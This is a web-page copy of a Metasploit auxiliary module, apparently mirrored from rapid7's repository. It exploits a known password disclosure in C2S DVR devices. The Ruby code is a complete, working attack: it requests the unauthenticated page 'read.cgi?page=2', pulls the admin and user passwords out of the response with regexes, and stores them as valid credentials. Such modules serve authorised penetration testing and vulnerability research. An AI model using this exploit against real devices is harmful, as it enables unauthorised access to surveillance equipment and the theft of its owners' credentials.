Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/gather/c2s_dvr_password_disclosure.rb
19715 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Auxiliary
7
include Msf::Exploit::Remote::HttpClient
8
include Msf::Auxiliary::Scanner
9
include Msf::Auxiliary::Report
10
11
def initialize
12
super(
13
'Name' => 'C2S DVR Management Password Disclosure',
14
'Description' => %q{
15
C2S DVR allows an unauthenticated user to disclose the username
16
& password by requesting the javascript page 'read.cgi?page=2'.
17
This may also work on some cameras including IRDOME-II-C2S, IRBOX-II-C2S.
18
},
19
'References' => [['EDB', '40265']],
20
'Author' => [
21
'Yakir Wizman', # discovery
22
'h00die', # module
23
],
24
'License' => MSF_LICENSE,
25
'DisclosureDate' => 'Aug 19 2016'
26
)
27
28
register_options([
29
OptString.new('TARGETURI', [false, 'URL of the C2S DVR root', '/'])
30
])
31
end
32
33
def run_host(rhost)
34
begin
35
url = normalize_uri(datastore['TARGETURI'], 'cgi-bin', 'read.cgi')
36
vprint_status("Attempting to load data from #{url}?page=2")
37
res = send_request_cgi({
38
'uri' => url,
39
'vars_get' => { 'page' => '2' }
40
})
41
unless res
42
print_error("#{peer} Unable to connect to #{url}")
43
return
44
end
45
46
unless res.body.include?('pw_enflag')
47
print_error("Invalid response received for #{peer} for #{url}")
48
return
49
end
50
51
if res.body =~ /pw_adminpw = "(.+?)";/
52
print_good("Found: admin:#{$1}")
53
store_valid_credential(
54
user: 'admin',
55
private: $1,
56
private_type: :password
57
)
58
end
59
60
if res.body =~ /pw_userpw = "(.+?)";/
61
print_good("Found: user:#{$1}")
62
store_valid_credential(
63
user: 'user',
64
private: $1,
65
private_type: :password
66
)
67
end
68
rescue ::Rex::ConnectionError
69
print_error("#{peer} Unable to connect to site")
70
return
71
end
72
end
73
end
74
75